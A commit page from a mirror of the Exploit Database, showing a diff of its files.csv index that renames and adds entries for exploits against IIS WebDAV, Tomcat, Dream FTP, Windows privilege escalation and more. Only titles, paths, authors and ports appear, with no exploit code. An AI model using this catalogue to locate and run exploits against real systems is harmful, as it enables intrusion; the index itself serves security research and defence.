bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-05-17

Browse source 
12 new exploits

Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit
Microsoft Windows WebDAV - Remote PoC Exploit
Microsoft Windows IIS WebDAV - 'ntdll.dll' Remote Exploit
Microsoft Windows IIS 5.0 WebDAV - Remote PoC Exploit

Microsoft Windows WebDav II - Remote Root Exploit (2)
Microsoft Windows WebDAV - Remote Root Exploit (2)

Microsoft Windows WebDav III - Remote Root Exploit (xwdav)
Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)

Dream FTP 1.2 - Remote Format String Exploit
BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit

Apache Tomcat (webdav) - Remote File Disclosure Exploit
Apache Tomcat (WebDAV) - Remote File Disclosure Exploit

Apache Tomcat (webdav) - Remote File Disclosure Exploit (ssl support)
Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL)

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)
Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (PHP)
Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP)

Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC
Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote DoS PoC

Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow

Liferay 6.0.x Webdav File Reading Vulnerability
Liferay 6.0.x WebDAV - File Reading Vulnerability

Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities
Microsoft IIS 6.0 and 7.5 (+ PHP) - Multiple Vulnerabilities
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1)
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2)
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (1)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (2)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (3)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (4)

BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2)

Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability

Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1)

Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness

Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness

MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit

Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
Apache Struts 2.0.0 <= 2.2.1.1 -  XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability

EasyCafe Server <= 2.2.14 Remote File Read
EasyCafe Server <= 2.2.14 - Remote File Read
x86_64 Linux bind TCP port shellcode
TCP Bindshell with Password Prompt - 162 bytes
x86_64 Linux bind TCP port shellcode
TCP Bindshell with Password Prompt - 162 bytes

Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)
CakePHP Framework 3.2.4 - IP Spoofing
Multiples Nexon Games - Unquoted Path Privilege Escalation
eXtplorer 2.1.9 - Archive Path Traversal
Web interface for DNSmasq / Mikrotik - SQL Injection
Microsoft Excel 2010 - Crash PoC
Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation
Web2py 2.14.5 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-05-17 05:03:19 +00:00
parent 4a2ec207ee
commit 8fea20e59f
18 changed files with 1008 additions and 1094 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

60
files.csv
View file

@ -1,6 +1,6 @@
id,file,description,date,author,platform,type,port
1,platforms/windows/remote/1.c,"Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft Windows WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80
1,platforms/windows/remote/1.c,"Microsoft Windows IIS WebDAV - 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft Windows IIS 5.0 WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0
5,platforms/windows/remote/5.c,"Microsoft Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -34,7 +34,7 @@ id,file,description,date,author,platform,type,port
33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000
34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) Remote Exploit",2003-05-29,N/A,linux,remote,80
35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0
36,platforms/windows/remote/36.c,"Microsoft Windows WebDav II - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69
@ -49,7 +49,7 @@ id,file,description,date,author,platform,type,port
48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25
50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80
51,platforms/windows/remote/51.c,"Microsoft Windows WebDav III - Remote Root Exploit (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
51,platforms/windows/remote/51.c,"Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0
54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21
@ -645,7 +645,7 @@ id,file,description,date,author,platform,type,port
819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Win OS support)",2005-02-15,"Jerome Athias",windows,remote,80
820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0
822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21
823,platforms/windows/remote/823.c,"Dream FTP 1.2 - Remote Format String Exploit",2004-02-11,Skylined,windows,remote,21
823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21
824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated)",2005-09-13,Qnix,linux,local,0
825,platforms/windows/remote/825.c,"3Com Ftp Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21
826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203
@ -4175,7 +4175,7 @@ id,file,description,date,author,platform,type,port
4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection Vulnerability",2007-10-13,"Khashayar Fereidani",php,webapps,0
4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module Remote SQL Injection Vulnerability",2007-10-13,"Mehmet Ince",php,webapps,0
4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0
4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0
4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0
4531,platforms/windows/local/4531.py,"jetAudio 7.x (m3u File) Local SEH Overwrite Exploit",2007-10-14,h07,windows,local,0
4532,platforms/linux/dos/4532.pl,"eXtremail <= 2.1.1 memmove() Remote Denial of Service Exploit",2007-10-15,mu-b,linux,dos,0
4533,platforms/linux/remote/4533.c,"eXtremail <= 2.1.1 (LOGIN) Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,4501
@ -4197,7 +4197,7 @@ id,file,description,date,author,platform,type,port
4549,platforms/php/webapps/4549.txt,"PHP Project Management <= 0.8.10 - Multiple RFI / LFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0
4550,platforms/php/webapps/4550.pl,"BBPortalS <= 2.0 - Remote Blind SQL Injection Exploit",2007-10-21,Max007,php,webapps,0
4551,platforms/php/webapps/4551.txt,"PeopleAggregator <= 1.2pre6-release-53 - Multiple RFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0
4552,platforms/linux/remote/4552.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit (ssl support)",2007-10-21,h3rcul3s,linux,remote,0
4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL)",2007-10-21,h3rcul3s,linux,remote,0
4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions safe_mode and disable_function bypass",2007-10-22,shinnai,windows,local,0
4554,platforms/php/webapps/4554.txt,"SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability",2007-10-22,BiNgZa,php,webapps,0
4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 scripture.php Remote File Inclusion Vulnerability",2007-10-22,GoLd_M,php,webapps,0
@ -8253,7 +8253,7 @@ id,file,description,date,author,platform,type,port
8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability",2009-05-20,snakespc,php,webapps,0
8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0
8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (Updated)",2009-05-20,"Landon Fuller",osx,remote,0
8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0
8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0
8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability",2009-05-21,Striker7,php,webapps,0
8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0
8757,platforms/windows/remote/8757.html,"BaoFeng (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0
@ -8263,7 +8263,7 @@ id,file,description,date,author,platform,type,port
8762,platforms/php/webapps/8762.txt,"Article Directory (page.php) Remote Blind SQL Injection Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
8763,platforms/php/webapps/8763.txt,"ZaoCMS Insecure Cookie Handling Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
8764,platforms/php/webapps/8764.txt,"ZaoCMS (download.php) Remote File Disclosure Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0
8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0
8766,platforms/php/webapps/8766.txt,"Tutorial Share <= 3.5.0 Insecure Cookie Handling Vulnerability",2009-05-22,Evil-Cod3r,php,webapps,0
8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0
8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection Vulnerability",2009-05-22,Qabandi,php,webapps,0
@ -13650,7 +13650,7 @@ id,file,description,date,author,platform,type,port
15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0
15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0
15803,platforms/windows/dos/15803.py,"Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0
15803,platforms/windows/dos/15803.py,"Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0
15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - (.m3u) Buffer Overflow",2010-12-11,zota,windows,local,0
15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0
@ -14267,7 +14267,7 @@ id,file,description,date,author,platform,type,port
16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS CGI Filename Double Decode Command Execution",2011-01-08,metasploit,windows,remote,0
16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - (.htr) Path Overflow",2010-04-30,metasploit,windows,remote,0
16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 Printer Host Header Overflow",2010-04-30,metasploit,windows,remote,0
16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow",2010-07-25,metasploit,windows,remote,0
16470,platforms/windows/remote/16470.rb,"Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow",2010-07-25,metasploit,windows,remote,0
16471,platforms/windows/remote/16471.rb,"Microsoft IIS WebDAV Write Access Code Execution",2010-09-20,metasploit,windows,remote,0
16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 IDQ Path Overflow",2010-06-15,metasploit,windows,remote,0
16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow",2010-06-22,metasploit,windows,remote,0
@ -16239,7 +16239,7 @@ id,file,description,date,author,platform,type,port
18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,metasploit,windows,local,0
18761,platforms/linux/remote/18761.rb,"Adobe Flash Player ActionScript Launch Command Execution Vulnerability",2012-04-20,metasploit,linux,remote,0
18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0
18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x Webdav File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0
18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x WebDAV - File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0
18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) Multiple XSS",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0
18765,platforms/windows/dos/18765.txt,"samsung net-i ware <= 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0
18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST CSRF",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0
@ -16436,7 +16436,7 @@ id,file,description,date,author,platform,type,port
19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection Vulnerability",2012-06-08,"Easy Laster",php,webapps,0
19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 DEBUG Vulnerability",1988-08-01,anonymous,linux,remote,0
19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability",2012-06-10,"Easy Laster",php,webapps,0
19033,platforms/windows/remote/19033.txt,"Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 and 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0
19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0
19036,platforms/php/webapps/19036.php,"WordPress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0
@ -19612,10 +19612,10 @@ id,file,description,date,author,platform,type,port
22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Vulnerability (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0
22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Vulnerability (2)",2003-04-10,"Wojciech Purczynski",linux,local,0
22364,platforms/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass Vulnerability",2003-03-17,"dong-h0un U",cgi,webapps,0
22365,platforms/windows/remote/22365.pl,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1)",2003-03-24,mat,windows,remote,0
22366,platforms/windows/remote/22366.c,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2)",2003-03-31,ThreaT,windows,remote,0
22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0
22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
22365,platforms/windows/remote/22365.pl,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (1)",2003-03-24,mat,windows,remote,0
22366,platforms/windows/remote/22366.c,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (2)",2003-03-31,ThreaT,windows,remote,0
22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0
22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x UUEncoding Parsing Memory Corruption Vulnerability",2003-03-17,"Core Security",linux,remote,0
22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0
22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0
@ -20874,7 +20874,6 @@ id,file,description,date,author,platform,type,port
23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout Vulnerability",2004-02-06,"Markus Mueller",linux,local,0
23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing Vulnerability",2004-02-06,"Tri Huynh",cgi,webapps,0
23660,platforms/windows/dos/23660.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (1)",2004-02-07,shaun2k2,windows,dos,0
23661,platforms/windows/remote/23661.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2)",2004-02-07,Skylined,windows,remote,0
23662,platforms/linux/dos/23662.c,"Nadeo Game Engine Remote Denial of Service Vulnerability",2004-02-09,scrap,linux,dos,0
23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 - 'News' Module Cross-Site Scripting Vulnerability",2004-02-09,"Janek Vind",php,webapps,0
23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 Results.STM Post Request Buffer Overflow Vulnerability",2004-02-09,nd@felinemenace.org,windows,dos,0
@ -20968,7 +20967,6 @@ id,file,description,date,author,platform,type,port
23762,platforms/windows/dos/23762.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (3)",2004-02-26,shaun2k2,windows,dos,0
23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (4)",2004-02-26,lion,windows,remote,0
23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 Error Page Cross-Site Scripting Vulnerability",2004-02-26,Soby,hardware,remote,0
23765,platforms/solaris/local/23765.c,"Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability",2004-02-27,"Marco Ivaldi",solaris,local,0
23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage Vulnerability",2004-02-27,iDefense,windows,remote,0
23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0
23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability",2003-09-11,Jelmer,windows,remote,0
@ -25279,7 +25277,6 @@ id,file,description,date,author,platform,type,port
28218,platforms/php/webapps/28218.txt,"Koobi Pro 5.6 showtopic Module toid Parameter XSS",2006-07-13,"Evampire chiristof",php,webapps,0
28219,platforms/php/webapps/28219.txt,"Koobi Pro 5.6 showtopic Module toid Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0
28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x ReplaceChild Denial of Service Vulnerability",2006-07-14,hdm,linux,dos,0
28221,platforms/php/webapps/28221.pl,"Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1)",2006-07-13,1dt.w0lf,php,webapps,0
28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0
28223,platforms/php/webapps/28223.txt,"Subberz Lite UserFunc Remote File Include Vulnerability",2006-07-14,"Chironex Fleckeri",php,webapps,0
28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0
@ -25475,7 +25472,7 @@ id,file,description,date,author,platform,type,port
28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0
28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.PHP Cross-Site Scripting Vulnerability",2006-08-21,night_warrior771,php,webapps,0
28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.PHP Remote File Include Vulnerability",2006-08-22,Root3r_H3ll,php,webapps,0
28424,platforms/linux/remote/28424.txt,"Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0
28424,platforms/linux/remote/28424.txt,"Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0
28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure Vulnerability",2006-03-27,anonymous,solaris,local,0
28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0
28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution Vulnerability",2006-08-18,anonymous,novell,local,0
@ -27760,7 +27757,7 @@ id,file,description,date,author,platform,type,port
30832,platforms/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper Class ActiveX Control Remote Buffer Overflow Denial of Service Vulnerability",2007-11-29,"Elazar Broad",windows,dos,0
30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN My.Logon.PHP3 - Cross-Site Scripting Vulnerability",2007-11-30,"Richard Brain",hardware,remote,0
30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0
30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0
30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0
30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.PHP SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0
30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0
30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x_Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0
@ -28214,7 +28211,7 @@ id,file,description,date,author,platform,type,port
31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure/HTML Injection/Cross-Site Scripting",2008-03-03,"Digital Security Research Group",php,webapps,0
31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0.57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0
31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
31329,platforms/multiple/webapps/31329..txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0
31329,platforms/multiple/webapps/31329.txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0
31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0
31338,platforms/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",windows,dos,0
31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0
@ -32189,7 +32186,7 @@ id,file,description,date,author,platform,type,port
35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion/SQL Injection/XSS",2015-01-09,Technidev,php,webapps,80
35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
